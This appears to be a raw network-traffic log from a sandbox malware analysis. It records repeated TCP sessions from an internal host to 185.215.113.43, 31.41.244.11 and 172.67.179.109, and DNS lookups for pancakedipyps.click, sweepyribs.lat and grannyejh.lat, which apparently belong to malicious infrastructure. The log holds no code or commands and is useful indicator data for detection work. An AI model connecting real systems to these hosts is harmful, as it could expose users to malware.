                                                                                                                                                                                          Dec 18, 2024 09:07:39.862720013 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.862793922 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.862823009 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.862899065 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:42.113595963 CET4972380192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:42.113904953 CET4972680192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:42.233433962 CET8049726185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:42.233479977 CET8049723185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:42.233517885 CET4972680192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:42.233525038 CET4972380192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:42.233762026 CET4972680192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:42.353324890 CET8049726185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:43.562916040 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:43.563014030 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:43.563118935 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:43.564225912 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:43.564265966 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:44.774244070 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:44.774359941 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:44.776113033 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:44.776139021 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:44.776451111 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:44.816023111 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:44.816066027 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:44.816123009 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:44.940169096 CET8049726185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:44.940258980 CET4972680192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:45.506252050 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:45.506352901 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:45.506570101 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:45.506676912 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:45.506702900 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:45.506717920 CET49727443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:45.506725073 CET44349727172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:45.557425976 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:45.557481050 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:45.557600021 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:45.557991028 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:45.558022976 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:46.562711000 CET4972680192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:46.563024044 CET4972980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:46.682673931 CET8049729185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:46.682787895 CET4972980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:46.682804108 CET8049726185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:46.682863951 CET4972680192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:46.712085009 CET4972980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:46.767231941 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:46.767355919 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:46.769048929 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:46.769062996 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:46.769390106 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:46.770921946 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:46.770952940 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:46.771008968 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:46.831671953 CET8049729185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.739818096 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.739861012 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.739909887 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.739940882 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.739955902 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.739973068 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.739995956 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.740000010 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.740040064 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.748064995 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.756238937 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.756299973 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.756325960 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.764578104 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.764663935 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.764682055 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.811790943 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.811858892 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.858793020 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.930679083 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934504032 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934547901 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934597969 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934667110 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934705019 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934751034 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934782982 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934926033 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934962988 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:47.934988976 CET49728443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:47.935003042 CET44349728172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:48.009388924 CET8049729185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:48.009455919 CET4972980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:48.190694094 CET49730443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:48.190785885 CET44349730172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:48.190871954 CET49730443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:48.191250086 CET49730443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:48.191287994 CET44349730172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:49.409707069 CET44349730172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:49.409801960 CET49730443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:49.420247078 CET49730443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:49.420274019 CET44349730172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:49.420583010 CET44349730172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:49.423832893 CET49730443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:49.424020052 CET49730443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:49.424052000 CET44349730172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:49.516175032 CET4972980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:49.516493082 CET4973180192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:49.646348000 CET8049731185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:49.646516085 CET8049729185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:49.646637917 CET4972980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:49.646639109 CET4973180192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:49.664885044 CET4973180192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:49.784648895 CET8049731185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:50.221132994 CET44349730172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:50.221218109 CET44349730172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:50.221277952 CET49730443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:50.221388102 CET49730443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:50.221409082 CET44349730172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:50.408585072 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:50.408638000 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:50.408834934 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:50.409271002 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:50.409293890 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:50.989154100 CET8049731185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:50.989267111 CET4973180192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:51.624793053 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:51.624886990 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:51.626116991 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:51.626137972 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:51.626482010 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:51.627604961 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:51.627754927 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:51.627805948 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:51.627893925 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:51.675345898 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:52.413630962 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:52.413764954 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:52.413995028 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:52.436851025 CET49732443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:52.436924934 CET44349732172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:52.702214956 CET4973180192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:52.702677965 CET4973380192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:52.822432041 CET8049731185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:52.822499037 CET8049733185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:52.822555065 CET4973180192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:52.822582960 CET4973380192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:52.822746038 CET4973380192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:52.922307014 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:52.922399998 CET44349734172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:52.922585011 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:52.922836065 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:52.922869921 CET44349734172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:52.942555904 CET8049733185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:54.130971909 CET44349734172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:54.131066084 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:54.132320881 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:54.132369041 CET44349734172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:54.132714987 CET44349734172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:54.133923054 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:54.134063959 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:54.134107113 CET44349734172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:54.134181023 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:54.134196043 CET44349734172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:54.159136057 CET8049733185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:54.159415007 CET4973380192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:55.023257971 CET44349734172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:55.023502111 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:55.023509979 CET44349734172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:55.023575068 CET49734443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:55.672624111 CET4973380192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:55.672923088 CET4973580192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:55.794936895 CET8049735185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:55.795042038 CET4973580192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:55.795227051 CET8049733185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:55.795237064 CET4973580192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:55.795281887 CET4973380192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:55.883269072 CET49736443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:55.883306980 CET44349736172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:55.883378983 CET49736443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:55.883724928 CET49736443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:55.883747101 CET44349736172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:55.915415049 CET8049735185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:57.091733932 CET44349736172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:57.092062950 CET49736443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:57.093194962 CET49736443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:57.093250990 CET44349736172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:57.093615055 CET44349736172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:57.094830990 CET49736443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:57.094921112 CET49736443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:57.094934940 CET44349736172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:57.142173052 CET8049735185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:57.142266989 CET4973580192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:57.860341072 CET44349736172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:57.860460997 CET44349736172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:57.860544920 CET49736443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:57.860634089 CET49736443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:57.860650063 CET44349736172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:58.379597902 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:58.379693985 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:58.379815102 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:58.380165100 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:58.380202055 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:58.767448902 CET4973580192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:58.767713070 CET4973880192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:58.887325048 CET8049738185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:58.887425900 CET4973880192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:58.887598991 CET8049735185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:58.887623072 CET4973880192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:58.887778044 CET4973580192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:59.007354975 CET8049738185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.595875978 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.595987082 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.601958990 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.601993084 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.602257967 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.603435993 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.604206085 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.604249001 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.604410887 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.604450941 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.604603052 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.604648113 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.604824066 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.604870081 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605084896 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605134964 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605350018 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605386972 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605406046 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605434895 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605499983 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605544090 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605649948 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605714083 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.605746031 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.651330948 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.651568890 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.651619911 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.651674032 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.651695967 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.651777029 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.651830912 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:59.651856899 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:07:59.651890039 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:00.223702908 CET8049738185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:00.223915100 CET4973880192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:01.734493971 CET4973880192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:01.734734058 CET4973980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:01.854566097 CET8049739185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:01.854614019 CET8049738185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:01.854795933 CET4973880192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:01.854809046 CET4973980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:01.855036974 CET4973980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:01.885814905 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:01.885898113 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:01.885986090 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:08:01.886102915 CET49737443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:08:01.886140108 CET44349737172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:01.898118019 CET49740443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:08:01.898195982 CET44349740172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:01.898308039 CET49740443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:08:01.898714066 CET49740443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:08:01.898751020 CET44349740172.67.179.109192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:01.974735975 CET8049739185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:02.921885014 CET49740443192.168.2.8172.67.179.109
                                                                                                                                                                                          Dec 18, 2024 09:08:03.196125031 CET8049739185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:03.196221113 CET4973980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:05.304253101 CET4973980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:05.305016994 CET4974180192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:05.313396931 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:08:05.424609900 CET8049739185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:05.424772024 CET8049741185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:05.424860001 CET4973980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:05.424895048 CET4974180192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:05.425483942 CET4974180192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:08:05.433351994 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:05.433430910 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:08:05.545155048 CET8049741185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:06.768769026 CET8049741185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:08:06.768969059 CET4974180192.168.2.8185.215.113.43
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Dec 18, 2024 09:07:15.786127090 CET5925153192.168.2.81.1.1.1
                                                                                                                                                                                          Dec 18, 2024 09:07:16.090147018 CET53592511.1.1.1192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:42.955482960 CET5451253192.168.2.81.1.1.1
                                                                                                                                                                                          Dec 18, 2024 09:07:43.178621054 CET53545121.1.1.1192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:43.181644917 CET5592153192.168.2.81.1.1.1
                                                                                                                                                                                          Dec 18, 2024 09:07:43.556766033 CET53559211.1.1.1192.168.2.8
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Dec 18, 2024 09:07:15.786127090 CET192.168.2.81.1.1.10xbcb8Standard query (0)pancakedipyps.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 18, 2024 09:07:42.955482960 CET192.168.2.81.1.1.10xa03fStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 18, 2024 09:07:43.181644917 CET192.168.2.81.1.1.10xe023Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
